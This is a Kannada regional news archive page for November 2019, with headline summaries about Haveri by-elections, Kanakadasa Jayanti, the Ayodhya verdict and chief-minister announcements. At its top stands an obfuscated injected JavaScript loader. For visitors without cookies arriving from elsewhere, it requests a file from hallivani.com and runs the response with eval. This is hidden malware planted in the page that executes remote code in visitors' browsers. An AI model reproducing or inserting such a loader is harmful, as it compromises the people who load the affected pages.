;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//hallivani.com/8jju21px/cache/cache.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};

Month: November 2019

ಮನುಷ್ಯನ ಕಷ್ಟಕಾರ್ಪಣ್ಯಗಳನ್ನು ದಮನ ಮಾಡುವ ಶಕ್ತಿ ದೀಪಕ್ಕಿದೆ: ಚಂದ್ರಶೇಖರ ಶಿವಾಚಾರ್ಯ ಶ್ರೀ

ಹಾವೇರಿ: ಮನುಷ್ಯನ ಜೀವನದಲ್ಲಿ ಬಂದಿರುವ ಕಷ್ಟಕಾರ್ಪಣ್ಯಗಳ ದಮನ ಮಾಡುವ ಶಕ್ತಿ ದೀಪಕ್ಕಿದೆ. ಎಂದು ಬನ್ನಿಕೊಪ್ಪ ಹಿರೇಮಠದ ಡಾ.ಮುಮ್ಮಡಿ ಚಂದ್ರಶೇಖರ ಶಿವಾಚಾರ್ಯ…

ಚುನಾವಣಾ ಕರ್ತವ್ಯಲೋಪ: ತಡಸ ಪಿಡಿಓ ಸಂಗನಗೌಡ ಪಾಟೀಲ ಅಮಾನತು

ಹಾವೇರಿ: ಚುನಾವಣಾ ಕರ್ತವ್ಯಲೋಪ ಎಸಗಿದ ತಡಸದ ಪಿಡಿಓ ಸಂಗನಗೌಡ ಪಾಟೀಲ ಇವರನ್ನು ಚುನಾವಣಾ ಕರ್ತವ್ಯಲೋಪ ಎಸಗಿದ ಹಿನ್ನಲೆಯಲ್ಲಿ ಜಿಲ್ಲಾಧಿಕಾರಿಗಳು ಅಮಾನತುಗೊಳಿಸಿ…

ಸವಣೂರು: ವಿವಿಧ ಅಂಗಡಿಗಳ ಮೇಲೆ ದಾಳಿ ರೂ.1230 ದಂಡ ವಸೂಲಿ

ಹಾವೇರಿ: ರಾಷ್ಟ್ರೀಯ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕಾರ್ಯಕ್ರಮದಡಿ ಜಿಲ್ಲಾ ತಂಬಾಕು ನಿಯಂತ್ರಣ ಕೋಶ ಹಾಗೂ ವಿವಿಧ ಅಧಿಕಾರಿಗಳನ್ನೊಳಗೊಂಡ ತಂಡ ಇತ್ತೀಚೆಗೆ ಸವಣೂರು…

ಕರ್ನಾಟಕ ಪಶ್ಚಿಮ ಪದವೀಧರ ಮತ ಕ್ಷೇತ್ರ ಚುನಾವಣೆ:ಮತದಾರ ಪಟ್ಟಿಗೆ ಹೆಸರು ಸೇರಿಸಲು ಅವಧಿ ವಿಸ್ತರಣೆ

ಹಾವೇರಿ: ಕರ್ನಾಟಕ ಪಶ್ಚಿಮ ಪದವೀಧರ ಮತ ಕ್ಷೇತ್ರದಿಂದ ಕರ್ನಾಟಕ ವಿಧಾನ ಪರಿಷತ್ತಿಗೆ-2020ರಲ್ಲಿ ಚುನಾವಣೆ ಜರುಗಲಿದೆ. ಮತದಾರ ಪಟ್ಟಿಗೆ ಹೆಸರು ಸೇರಿಸಲು…

ಉಪ ಚುನಾವಣೆ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಮದ್ಯ ಮಾರಾಟ, ಮದ್ಯಪಾನ ನಿಷೇಧ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ಹಿರೇಕೆರೂರು ಹಾಗೂ ರಾಣೇಬೆನ್ನೂರು ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರಗಳ ಉಪ ಚುನಾವಣೆ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಡಿಸೆಂಬರ್ 3ರ ಸಂಜೆ 6 ರಿಂದ…

ಜಿಲ್ಲಾಡಳಿತದಿಂದ ಸರಳ ಕನಕದಾಸರ ಜಯಂತಿ ಆಚರಣೆ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯಲ್ಲಿ ಉಪ ಚುನಾವಣೆ ಘೋಷಣೆ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಭಕ್ತ ಕನಕದಾಸರ ಜಯಂತಿಯನ್ನು ಜಿಲ್ಲಾಡಳಿತದಿಂದ ಸರಳವಾಗಿ ಆಚರಿಸಲಾಯಿತು. ಶುಕ್ರವಾರ ಜಿಲ್ಲಾಧಿಕಾರಿ ಕಚೇರಿ…

ಕನಕ ಜಯಂತಿ ಆಚರಣೆ

ಹಾವೇರಿ: ನಗರದ ಬಸವಕೇಂದ್ರ ಹೊಸಮಠ ಹಾಗೂ ಸ್ಥಳೀಯ ಎಸ್‌ಜೆಎಂ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳ ಆಶ್ರಯದಲ್ಲಿ ಶುಕ್ರವಾರ ಸಂತ ಶ್ರೇಷ್ಠ ಕನಕದಾಸರ ಜಯಂತಿಯನ್ನು…

ರಾಣೇಬೆನ್ನೂರ ಉಪಸಮರಕ್ಕೆ ಬಿಜೆಪಿ ಅಭ್ಯರ್ಥಿ ಅರುಣ ಕುಮಾರ ಪೂಜಾರ: ಮುಖ್ಯಮಂತ್ರಿ ಬಿಎಸ್ ವೈ ಘೋಷಣೆ

ಹಾವೇರಿ: ಡಿ.5ರಂದು ನಡೆಯುವ ರಾಣೇಬೆನ್ನೂರ ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರದ ಉಪ ಚುನಾವಣೆಗೆ ಬಿಜೆಪಿ ಅಭ್ಯರ್ಥಿಯನ್ನಾಗಿ ಅರುಣಕುಮಾರ ಪೂಜಾರ ಅವರನ್ನು ಅಂತಿಮಗೊಳಿಸಲಾಗಿದೆ ಎಂದು…

ಮಕ್ಕಳಿಗೆ ಉತ್ತಮ ಗುಣಾತ್ಮಕ ಶಿಕ್ಷಣ ನೀಡಿ: ಬಸವಶಾಂತಲಿಂಗ ಶ್ರೀ

ಹಾವೇರಿ: ಮಕ್ಕಳಿಗೆ ಉತ್ತಮ ಗುಣಾತ್ಮಕ ಶಿಕ್ಷಣ ನೀಡುವ ಜೊತೆಗೆ ಬಾಲ್ಯದಿಂದಲೇ ಶಾಲೆಗೆ ಹೋಗುವ ಹವ್ಯಾಸವನ್ನು ಪೋಷಕರು ಮಕ್ಕಳಿಗೆ ರೂಢಿಸಬೇಕು ಎಂದು…

ಹಿರೇಕೆರೂರು, ರಾಣೇಬೆನ್ನೂರು ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರಗಳಿಗೆ ಉಪ ಚುನಾವಣೆ ನ.11 ರಿಂದ ನಾಮಪತ್ರ ಸಲ್ಲಿಕೆ ಆರಂಭ- ನಾಳೆಯಿಂದ ನೀತಿ ಸಂಹಿತೆ ಜಾರಿ: ಜಿಲ್ಲಾಧಿಕಾರಿ ಕೃಷ್ಣ ಬಾಜಪೇಯಿ

ಹಾವೇರಿ: ಜಿಲ್ಲೆಯ ರಾಣೇಬೆನ್ನೂರು ಹಾಗೂ ಹಿರೇಕೆರೂರು ವಿಧಾನಸಭಾ ಕ್ಷೇತ್ರಕ್ಕೆ ಡಿಸೆಂಬರ್ 5 ರಂದು ನಡೆಯುವ ಉಪ ಚುನಾವಣೆಗೆ. ಇದೇ ನವಂಬರ್…

ಅಯೋಧ್ಯೆಯಲ್ಲಿ ರಾಮ ಮಂದಿರ ನಿರ್ಮಾಣ: ಸುಪ್ರೀಂ ಮಹತ್ವದ ತೀರ್ಪು

ನವದೆಹಲಿ: ಅಯೋಧ್ಯೆಯ ರಾಮಜನ್ಮಭೂಮಿ–ಬಾಬ್ರಿ ಮಸೀದಿ ವಿವಾದಕ್ಕೆ ಸಂಬಂಧಿಸಿದ ಬಹು ನಿರೀಕ್ಷಿತ ತೀರ್ಪು ಶನಿವಾರ ಪ್ರಕಟಗೊಂಡಿದ್ದು, ವಿವಾದಿತ ಜಾಗದಲ್ಲಿ ಮಂದಿರ ನಿರ್ಮಾಣಕ್ಕೆ…

ಸುಪ್ರೀಂ ಕೋರ್ಟ್ ತೀರ್ಪು ‌ದೇಶದಲ್ಲಿ ಸೌಹಾರ್ದತೆ ಕಾಪಾಡಲಿದೆ: ಸಚಿವ ಜಗದೀಶ್ ಶೆಟ್ಟರ್

ಹುಬ್ಬಳ್ಳಿ: ಅಯೋಧ್ಯೆ ರಾಮಮಂದಿರ ನಿರ್ಮಾಣದಲ್ಲಿ ಸುಪ್ರೀಂ ಕೋರ್ಟ್ ಐತಿಹಾಸಿಕ‌ ತೀರ್ಪು ನೀಡಿದ್ದು,ಇದು ದೇಶದಲ್ಲಿ ಸೌಹಾರ್ದತೆ ಕಾಪಾಡಿಕೊಳ್ಳುವ ತೀರ್ಪು ಎಂದು ಸಚಿವ…

ಅಯೋಧ್ಯೆ ತೀರ್ಪು ಹಿನ್ನಲೆ: ಜಿಲ್ಲಾದ್ಯಂತ ನಿಷೇಧಾಜ್ಞೆ ಜಾರಿ

ಹಾವೇರಿ: ಅಯೋಧ್ಯೆ ವಿವಾದ ತೀರ್ಪು ಪ್ರಕಟವಾಗುವ ಹಿನ್ನೆಲೆಯಲ್ಲಿ ಮುಂಜಾಗ್ರತಾ ಕ್ರಮವಾಗಿ ಹಾವೇರಿ ಜಿಲ್ಲಾದ್ಯಂತ ಸೆಕ್ಷನ್ 144 ರಂತೆ ಶನಿವಾರ ಬೆಳಿಗ್ಗೆ…

ಅಯೋಧ್ಯೆ ತೀರ್ಪು ಹಿನ್ನೆಲೆ: ರಾಜ್ಯಾದ್ಯಂತ ಶನಿವಾರ ಶಾಲಾ, ಕಾಲೇಜುಗಳಿಗೆ ರಜೆ ಘೋಷಣೆ

ಬೆಂಗಳೂರು: ಶತಮಾನದ ಹಳೆಯ ವಿವಾದ ಅಯೋಧ್ಯೆ ರಾಮಜನ್ಮಭೂಮಿ ಮತ್ತು ಬಾಬರಿ ಮಸೀದಿ ಪ್ರಕರಣ ಸಂಬಂಧ ಐತಿಹಾಸಿಕ ತೀರ್ಪು ಶನಿವಾರ ಸುಪ್ರೀಂ ಕೋರ್ಟ್…

ಹಿರೇಕೆರೂರು ತಾಲೂಕು ಅಭಿವೃದ್ಧಿಗೆ ಹೆಚ್ಚಿನ ಅನುದಾನ: ಮುಖ್ಯಮಂತ್ರಿ ಯಡಿಯೂರಪ್ಪ

ಹಿರೆಕೇರೂರು: ತಾಲೂಕಿಗೆ ಹೆಚ್ಚಿನ ಅನುದಾನ ನೀಡಿ‌ ಅಭಿವೃದ್ಧಿ ಕಾರ್ಯಗಳನ್ನು ಕೈಗೊಳ್ಳಲಾಗುವುದು ಎಂದು‌ ಮುಖ್ಯಮಂತ್ರಿ ಯಡಿಯೂರಪ್ಪ ಹೇಳಿದರು. ಗುರುವಾರ ಹಿರೇಕೆರೂರಿನ ಕ್ರೀಡಾಂಗಣದಲ್ಲಿ,…

ರಾಜ್ಯದ ಸಮಗ್ರ ಅಭಿವೃದ್ಧಿಗೆ ಯೋಜನೆ- ನೀರಾವರಿಗೆ ಆದ್ಯತೆ: ಮುಖ್ಯಮಂತ್ರಿ ಬಿ.ಎಸ್.ವೈ

ಹಾವೇರಿ: ರಾಜ್ಯದ ಸರ್ವಾಂಗೀಣ ಅಭಿವೃದ್ಧಿ ಯೋಜನೆ ರೂಪಿಸಿ, ನೀರಾವರಿಗೆ ಆದ್ಯತೆ ನೀಡಲಾಗುವುದರೊಂದಿಗೆ ರೈತರು ಬೆಳೆದಿರುವ ಬೆಳೆಗಳಿಗೆ ಬೆಂಬಲ ಬೆಲೆ ಒದಗಿಸಲಾಗುದು…

ಅತಿವೃಷ್ಟಿ, ಪ್ರವಾಹದಿಂದ ಹಾನಿಯಾದ ಮೂಲ ಸೌಕರ್ಯಗಳ ಭಿವೃದ್ಧಿಗೆ ಜಿಲ್ಲೆಗೆ ರೂ.100 ಕೋಟಿ ವಿಶೇಷ ಅನುದಾನ: ಮುಖ್ಯಮಂತ್ರಿ ಬಿ.ಎಸ್.ಯಡಿಯೂರಪ್ಪ ಘೋಷಣೆ

ಹಾವೇರಿ: ಅತಿವೃಷ್ಟಿ ಹಾಗೂ ಪ್ರವಾಹದಿಂದ ಹಾನಿಯಾದ ರಸ್ತೆ, ಸೇತುವೆ, ಕಟ್ಟಡ ಸೇರಿದಂತೆ ವಿವಿಧ ಇಲಾಖೆಯ ಮೂಲಸೌಕರ್ಯಗಳ ಅಭಿವೃದ್ಧಿಗೆ ಒಂದು ನೂರು…